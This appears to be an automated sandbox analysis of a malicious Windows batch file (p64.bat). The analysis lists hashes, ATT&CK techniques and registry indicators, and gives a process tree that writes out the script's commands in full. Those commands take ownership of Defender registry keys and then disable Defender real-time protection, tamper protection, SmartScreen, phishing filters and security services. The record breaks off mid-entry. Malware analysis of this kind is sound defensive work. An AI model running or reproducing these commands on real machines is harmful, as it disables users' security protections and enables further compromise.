d14ee261ed6c5dddc1900587c455991defe0f49c1da1172d7f8f1e163309d3e8

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
12/07/2024, 07:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$_32_/p64.bat
Size

12KB
MD5

1abf8067994181b1a38867bf6437f9d2
SHA1

d25e23848f65b85f0f21e9a0a69e4268b625eca2
SHA256

23bbb732ff55ab62dc8863a69626ef5655f60bf0d7b96fa2818a895e81283b40
SHA512

6237826de2feaf63c2f1312680118474f9b60f5516a05e171743a09a088d7c9bfd06ce9de17852e6f4c2dcb577814163621ff27b2a7bbb37f2a1ae130f64d882
SSDEEP

192:lBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:QK

Score

10^/10

evasion execution trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Logs\CBS\CbsPersist_20240712074711.cab	makecab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2908	powershell.exe
3012	powershell.exe
688	powershell.exe

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2440	PowerRun64.exe
2440	PowerRun64.exe
2308	PowerRun64.exe
2308	PowerRun64.exe
2128	PowerRun64.exe
2128	PowerRun64.exe
3012	PowerRun64.exe
3012	PowerRun64.exe
2416	PowerRun64.exe
2416	PowerRun64.exe
2068	PowerRun64.exe
2068	PowerRun64.exe
1284	PowerRun64.exe
1284	PowerRun64.exe
1620	PowerRun64.exe
1620	PowerRun64.exe
1868	PowerRun64.exe
1868	PowerRun64.exe
2764	PowerRun64.exe
2764	PowerRun64.exe
2836	PowerRun64.exe
2836	PowerRun64.exe
2136	PowerRun64.exe
2136	PowerRun64.exe
2744	PowerRun64.exe
2744	PowerRun64.exe
2956	PowerRun64.exe
3056	PowerRun64.exe
3056	PowerRun64.exe
2956	PowerRun64.exe
564	PowerRun64.exe
564	PowerRun64.exe
2984	PowerRun64.exe
1280	PowerRun64.exe
1280	PowerRun64.exe
2984	PowerRun64.exe
1704	PowerRun64.exe
1704	PowerRun64.exe
768	PowerRun64.exe
768	PowerRun64.exe
2592	PowerRun64.exe
2592	PowerRun64.exe
1708	PowerRun64.exe
1708	PowerRun64.exe
1588	PowerRun64.exe
1588	PowerRun64.exe
1816	PowerRun64.exe
1816	PowerRun64.exe
1032	PowerRun64.exe
1032	PowerRun64.exe
2448	PowerRun64.exe
2748	PowerRun64.exe
2748	PowerRun64.exe
2448	PowerRun64.exe
2300	PowerRun64.exe
2300	PowerRun64.exe
2684	PowerRun64.exe
2684	PowerRun64.exe
2228	PowerRun64.exe
1044	PowerRun64.exe
2228	PowerRun64.exe
2908	powershell.exe
1444	PowerRun64.exe
1444	PowerRun64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	2412	SetACL64.exe
Token: SeRestorePrivilege	2412	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2412	SetACL64.exe
Token: SeBackupPrivilege	1924	SetACL64.exe
Token: SeRestorePrivilege	1924	SetACL64.exe
Token: SeTakeOwnershipPrivilege	1924	SetACL64.exe
Token: SeBackupPrivilege	2256	SetACL64.exe
Token: SeRestorePrivilege	2256	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2256	SetACL64.exe
Token: SeBackupPrivilege	2448	SetACL64.exe
Token: SeRestorePrivilege	2448	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2448	SetACL64.exe
Token: SeBackupPrivilege	2788	SetACL64.exe
Token: SeRestorePrivilege	2788	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2788	SetACL64.exe
Token: SeBackupPrivilege	2496	SetACL64.exe
Token: SeRestorePrivilege	2496	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2496	SetACL64.exe
Token: SeBackupPrivilege	2380	SetACL64.exe
Token: SeRestorePrivilege	2380	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2380	SetACL64.exe
Token: SeBackupPrivilege	1996	SetACL64.exe
Token: SeRestorePrivilege	1996	SetACL64.exe
Token: SeTakeOwnershipPrivilege	1996	SetACL64.exe
Token: SeDebugPrivilege	2440	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2440	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2440	PowerRun64.exe
Token: 0	2440	PowerRun64.exe
Token: SeDebugPrivilege	2308	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2308	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2308	PowerRun64.exe
Token: 0	2308	PowerRun64.exe
Token: SeDebugPrivilege	2416	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2416	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2416	PowerRun64.exe
Token: SeDebugPrivilege	2128	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2128	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2128	PowerRun64.exe
Token: 0	2128	PowerRun64.exe
Token: SeDebugPrivilege	3012	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	3012	PowerRun64.exe
Token: SeDebugPrivilege	2228	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2228	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	3012	PowerRun64.exe
Token: 0	3012	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2228	PowerRun64.exe
Token: SeDebugPrivilege	1044	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1044	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1044	PowerRun64.exe
Token: SeDebugPrivilege	2068	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2068	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2068	PowerRun64.exe
Token: SeDebugPrivilege	1284	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1284	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1284	PowerRun64.exe
Token: 0	1284	PowerRun64.exe
Token: SeDebugPrivilege	1620	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1620	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1620	PowerRun64.exe
Token: SeDebugPrivilege	1868	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1868	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1868	PowerRun64.exe
Token: 0	1868	PowerRun64.exe
Token: SeDebugPrivilege	2764	PowerRun64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 2412	1448	cmd.exe	31
PID 1448 wrote to memory of 2412	1448	cmd.exe	31
PID 1448 wrote to memory of 2412	1448	cmd.exe	31
PID 1448 wrote to memory of 1924	1448	cmd.exe	32
PID 1448 wrote to memory of 1924	1448	cmd.exe	32
PID 1448 wrote to memory of 1924	1448	cmd.exe	32
PID 1448 wrote to memory of 2256	1448	cmd.exe	33
PID 1448 wrote to memory of 2256	1448	cmd.exe	33
PID 1448 wrote to memory of 2256	1448	cmd.exe	33
PID 1448 wrote to memory of 2448	1448	cmd.exe	34
PID 1448 wrote to memory of 2448	1448	cmd.exe	34
PID 1448 wrote to memory of 2448	1448	cmd.exe	34
PID 1448 wrote to memory of 2788	1448	cmd.exe	35
PID 1448 wrote to memory of 2788	1448	cmd.exe	35
PID 1448 wrote to memory of 2788	1448	cmd.exe	35
PID 1448 wrote to memory of 2496	1448	cmd.exe	36
PID 1448 wrote to memory of 2496	1448	cmd.exe	36
PID 1448 wrote to memory of 2496	1448	cmd.exe	36
PID 1448 wrote to memory of 2380	1448	cmd.exe	37
PID 1448 wrote to memory of 2380	1448	cmd.exe	37
PID 1448 wrote to memory of 2380	1448	cmd.exe	37
PID 1448 wrote to memory of 1996	1448	cmd.exe	38
PID 1448 wrote to memory of 1996	1448	cmd.exe	38
PID 1448 wrote to memory of 1996	1448	cmd.exe	38
PID 1448 wrote to memory of 2712	1448	cmd.exe	39
PID 1448 wrote to memory of 2712	1448	cmd.exe	39
PID 1448 wrote to memory of 2712	1448	cmd.exe	39
PID 1448 wrote to memory of 2764	1448	cmd.exe	40
PID 1448 wrote to memory of 2764	1448	cmd.exe	40
PID 1448 wrote to memory of 2764	1448	cmd.exe	40
PID 1448 wrote to memory of 2808	1448	cmd.exe	41
PID 1448 wrote to memory of 2808	1448	cmd.exe	41
PID 1448 wrote to memory of 2808	1448	cmd.exe	41
PID 1448 wrote to memory of 2812	1448	cmd.exe	42
PID 1448 wrote to memory of 2812	1448	cmd.exe	42
PID 1448 wrote to memory of 2812	1448	cmd.exe	42
PID 1448 wrote to memory of 2864	1448	cmd.exe	43
PID 1448 wrote to memory of 2864	1448	cmd.exe	43
PID 1448 wrote to memory of 2864	1448	cmd.exe	43
PID 1448 wrote to memory of 2860	1448	cmd.exe	44
PID 1448 wrote to memory of 2860	1448	cmd.exe	44
PID 1448 wrote to memory of 2860	1448	cmd.exe	44
PID 1448 wrote to memory of 2804	1448	cmd.exe	45
PID 1448 wrote to memory of 2804	1448	cmd.exe	45
PID 1448 wrote to memory of 2804	1448	cmd.exe	45
PID 1448 wrote to memory of 2840	1448	cmd.exe	46
PID 1448 wrote to memory of 2840	1448	cmd.exe	46
PID 1448 wrote to memory of 2840	1448	cmd.exe	46
PID 1448 wrote to memory of 2848	1448	cmd.exe	47
PID 1448 wrote to memory of 2848	1448	cmd.exe	47
PID 1448 wrote to memory of 2848	1448	cmd.exe	47
PID 1448 wrote to memory of 2740	1448	cmd.exe	48
PID 1448 wrote to memory of 2740	1448	cmd.exe	48
PID 1448 wrote to memory of 2740	1448	cmd.exe	48
PID 1448 wrote to memory of 2832	1448	cmd.exe	49
PID 1448 wrote to memory of 2832	1448	cmd.exe	49
PID 1448 wrote to memory of 2832	1448	cmd.exe	49
PID 1448 wrote to memory of 2616	1448	cmd.exe	50
PID 1448 wrote to memory of 2616	1448	cmd.exe	50
PID 1448 wrote to memory of 2616	1448	cmd.exe	50
PID 1448 wrote to memory of 1932	1448	cmd.exe	51
PID 1448 wrote to memory of 1932	1448	cmd.exe	51
PID 1448 wrote to memory of 1932	1448	cmd.exe	51
PID 1448 wrote to memory of 2836	1448	cmd.exe	52

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\$_32_\p64.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1924
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2788
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2380
- C:\Users\Admin\AppData\Local\Temp\$_32_\SetACL64.exe
  SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1996
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
  2⤵
  PID:2712
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
  2⤵
  PID:2764
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
  2⤵
  PID:2808
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
  2⤵
  PID:2812
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
  2⤵
  PID:2864
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
  2⤵
  PID:2860
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
  2⤵
  PID:2804
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
  2⤵
  PID:2840
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
  2⤵
  PID:2848
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
  2⤵
  PID:2740
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
  2⤵
  PID:2832
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:2616
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
  2⤵
  PID:1932
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:2836
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
  2⤵
  PID:2724
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
  2⤵
  PID:2884
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
  2⤵
  PID:2824
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
  2⤵
  PID:2636
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:2852
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
  2⤵
  PID:2940
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:2956
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
  2⤵
  PID:2632
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
  2⤵
  PID:1724
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
  2⤵
  PID:2772
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
  2⤵
  PID:2656
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
  2⤵
  PID:2720
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
  2⤵
  PID:2608
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
  2⤵
  PID:2604
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
  2⤵
  PID:2624
- C:\Windows\system32\reg.exe
